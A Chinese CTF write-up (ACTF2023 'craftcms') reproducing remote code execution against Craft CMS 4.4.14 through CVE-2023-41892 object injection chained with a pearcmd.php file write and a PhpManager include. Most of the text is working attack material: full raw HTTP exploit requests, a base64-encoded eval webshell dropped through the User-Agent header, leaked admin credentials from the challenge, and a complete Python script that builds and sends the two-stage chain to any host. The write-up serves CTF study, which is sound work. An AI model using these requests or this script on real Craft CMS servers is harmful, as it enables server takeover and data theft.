ACTF-Web Reproduction


ACTF2023-Web Reproduction

Thanks to the seniors' output, the club AK'd the Web category, which is really impressive. But I'm pretty weak and contributed little, so after some soul-searching, let me reproduce the challenges properly.

Web

craftcms

Let’s RCE!!!

The challenge description tells us the goal is RCE. Once the target is up, it turns out to be an instance of the open-source Craft CMS, so following that lead to look for known bugs turns up two notable RCE vulnerabilities affecting version 4.4.14.

CVE-2023-41892 Craft CMS remote code execution vulnerability analysis | Bmth's blog (bmth666.cn)

Qi An Xin Attack & Defense Community - command execution bypass analysis in a certain CMS (butian.net)

Concretely, these are the two articles I found.

Construct a request that reads phpinfo. The conditions/render action takes a JSON object config in the config parameter: its name field names the POST parameter holding the condition class, and the rest is handed to Yii's object creation, where a key of the form "as <name>" attaches a behavior, so any class can be instantiated with attacker-chosen constructor arguments and property values (CVE-2023-41892). Here that class is GuzzleHttp\Psr7\FnStream: the constructor argument {"close":null} creates the dynamic property _fn_close, the config then overwrites it with "phpinfo", and FnStream::__destruct() calls it:

POST /index.php HTTP/1.1
Host: 61.147.171.105:64298
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://61.147.171.105:53564/index.twig
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

From the phpinfo output we get the credentials: admin/actf2023passW0rdforCraftcms

Click "Go to your control panel" to log in to the backend.

The version is indeed 4.4.14. At first I wanted to use the later SSTI vulnerability, but Settings has been disabled, so the SSTI route (the second article) is no longer relevant.

The first article uses PhpManager.php to write a webshell into the log file and then includes the log to get RCE (yii\rbac\PhpManager's constructor loads its itemFile with require, which is what turns the same object injection into a local file include), but this challenge has logging turned off as well.

So what now?

NewStar2023 Week 3, which ended not long ago, had a pearcmd challenge solved with pearcmd, so we can use pearcmd directly to write a file and then include it. The PhpManager include is pointed at /usr/local/lib/php/pearcmd.php, where the official php Docker image ships PEAR. With register_argc_argv enabled (the default when no php.ini is installed), PHP splits the raw query string on "+" into $argv without URL-decoding it, so "?+config-create+/<?=phpinfo();?>+/tmp/1.php" makes pearcmd run config-create with "/<?=phpinfo();?>" as the root path (config-create insists that the root path be absolute, hence the leading slash) and /tmp/1.php as the output file. The generated config file contains that root path verbatim, so a second PhpManager request with itemFile=/tmp/1.php executes the tag. The first request below targets the web root; the later ones write under /tmp, which is the file that gets included at the end.

Using pearcmd to write a file (this request targets the web root):

POST /?+config-create+/<?=phpinfo();?>+/var/www/html/1.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 219

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

The same request, writing to /tmp/1.php instead:

POST /?+config-create+/<?=phpinfo();?>+/tmp/1.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 219

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

Writing a file that calls system("ls /") to /tmp/rce.php:

POST /?+config-create+/<?=system("ls%20/");?>+/tmp/rce.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 219

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

Writing a file that calls system("whoami") to /tmp/1.php:

POST /?+config-create+/<?=system("whoami");?>+/tmp/1.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 219

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/usr/local/lib/php/pearcmd.php"}]}}

Finally, include the file that was written; PhpManager's require executes it:

POST /index.php HTTP/1.1
Host: 61.147.171.105:64298
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: 627b0ba821a077f475abefb99d7bf1eb_username=d988d1b82d3d85d5075c5ae928e807eaa4df4fa4d57da2b27aecb2e67489293fa%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; __stripe_mid=36c8b14e-9b25-44b7-80a3-7d1afa2868712b596e; CRAFT_CSRF_TOKEN=f74a08742e218d2b7ebdc0dd0b5f097d1d13c6512322156a08d250837bc79cf5a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C795a52796888ae1390846fd599d6b4e5f201af1857dff1b69ce40ed0f81fab89MhEjDrAg8IDMylagfZvoep6TajCXqA1i7GO44ORb%7C1%22%3B%7D; CraftSessionId=9ae58b9bf26133ac1fe019b5501bd732; 627b0ba821a077f475abefb99d7bf1eb_identity=a33e3b26b3d436d790b0e2dd746c3b1dcd106a29303032517966f215a0703ccca%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22627b0ba821a077f475abefb99d7bf1eb_identity%22%3Bi%3A1%3Bs%3A159%3A%22%5B1%2C%22%5B%5C%22y26m_oAygOzqwErWffIy_dLFBJB30RzPPTGTsnwwpf0TwEpOqBKvQ3dwsCLihJd7BGo-1XYoPSeUaUL-ZVsSwwFdYOyfhaxydOm0%5C%22%2Cnull%2C%5C%22cac295178e991253f4aae6f6a861ae46%5C%22%5D%22%2C3600%5D%22%3B%7D; __stripe_sid=07e4088e-31e8-4775-b2aa-fe475979b6eb0a2d8e
User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>
Upgrade-Insecure-Requests: 1
Content-Length: 199

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/tmp/1.php"}]}}
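
To tie the chain together, here is an added example written for this reproduction; it is not code from the original post, from Craft CMS or from Yii. It builds the requests shown above from their parts, models PHP's "+" split so you can see exactly what pearcmd receives as argv, and keeps the network step separate. The pearcmd path and output paths are the ones used in the requests above; the target host and port are placeholders you fill in, and send_stage() is only called if you wire it up yourself.

```python
"""
Builder for the two-stage pearcmd chain used against Craft CMS 4.4.14 above.
Added example for this write-up, not code from the original post, Craft CMS
or Yii. Stage 1 hits the conditions/render sink (CVE-2023-41892) to
instantiate yii\\rbac\\PhpManager with itemFile pointing at pearcmd.php while
the query string carries pearcmd's argv; stage 2 includes the file pearcmd
wrote. Host and port are placeholders; nothing is sent unless send_stage()
is called against a real target.
"""
import http.client
from json import dumps
from urllib.parse import urlencode

PEARCMD = "/usr/local/lib/php/pearcmd.php"   # path used in the requests above
CONDITION = "craft\\elements\\conditions\\ElementCondition"


def php_argv(query_string):
    """Model how PHP fills $_SERVER['argv'] from QUERY_STRING when
    register_argc_argv is on: the raw string is split on '+' and nothing is
    URL-decoded, so argv[0] is the empty piece before the leading '+'."""
    return query_string.split("+")


def pearcmd_query(php_code, out_path):
    """Query string that makes an included pearcmd.php run
    `config-create /<php_code> <out_path>`.

    The leading '/' is required: config-create rejects a root path that is
    not absolute. pearcmd copies that root path verbatim into the config file
    it writes, so the PHP tag lands in <out_path> and runs on include.
    """
    if " " in php_code or "+" in php_code:
        raise ValueError("a literal space or '+' would split into extra argv entries")
    return "+config-create+/%s+%s" % (php_code, out_path)


def render_fields(condition_class, behavior, param="configObject", behavior_name=""):
    """Form fields for action=conditions/render. config.name names the POST
    parameter that holds the condition class; an 'as <name>' key in the same
    config attaches a behavior, and Yii instantiates behavior['class'] with
    the '__construct()' arguments, then assigns the remaining keys as
    properties."""
    config = {"name": param, "as " + behavior_name: behavior}
    return {
        "action": "conditions/render",
        param: condition_class,
        "config": dumps(config, separators=(",", ":")),
    }


def phpmanager_include(item_file):
    """Behavior that turns the sink into a file include:
    yii\\rbac\\PhpManager::__construct() -> init() -> load() -> require itemFile."""
    return {"class": "\\yii\\rbac\\PhpManager",
            "__construct()": [{"itemFile": item_file}]}


def fnstream_callback(function_name):
    """Behavior from the phpinfo request: GuzzleHttp\\Psr7\\FnStream creates a
    dynamic _fn_close property from its constructor argument, Yii overwrites
    it with the property value, and FnStream::__destruct() calls it."""
    return {"class": "\\GuzzleHttp\\Psr7\\FnStream",
            "__construct()": [{"close": None}],
            "_fn_close": function_name}


def plan(php_code, out_path="/tmp/1.php"):
    """Ordered (request_path, form_fields) pairs: write the file, then run it."""
    write = ("/?" + pearcmd_query(php_code, out_path),
             render_fields(CONDITION, phpmanager_include(PEARCMD)))
    run = ("/index.php", render_fields(CONDITION, phpmanager_include(out_path)))
    return [write, run]


def send_stage(host, port, path, fields, timeout=10):
    """POST one stage as application/x-www-form-urlencoded and return the
    response body. Needs a reachable target, so it is not run offline."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", path, body=urlencode(fields),
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        return conn.getresponse().read().decode("utf-8", "replace")
    finally:
        conn.close()


if __name__ == "__main__":
    # Print the two stages; to fire them, pass each pair to send_stage()
    # with the placeholder target replaced by the challenge instance.
    for path, fields in plan("<?=phpinfo();?>"):
        print(path)
        print(urlencode(fields))
        print()
```

Running it prints the two stages; pass each (path, fields) pair to send_stage() with the real host and port to fire them. The POST body is percent-encoded by urlencode(), unlike the raw Burp requests above, while the query string is left unencoded on purpose: the "+" separators are what PHP splits on, and pearcmd_query() refuses a payload containing a literal space or "+" because each would become an extra argv entry.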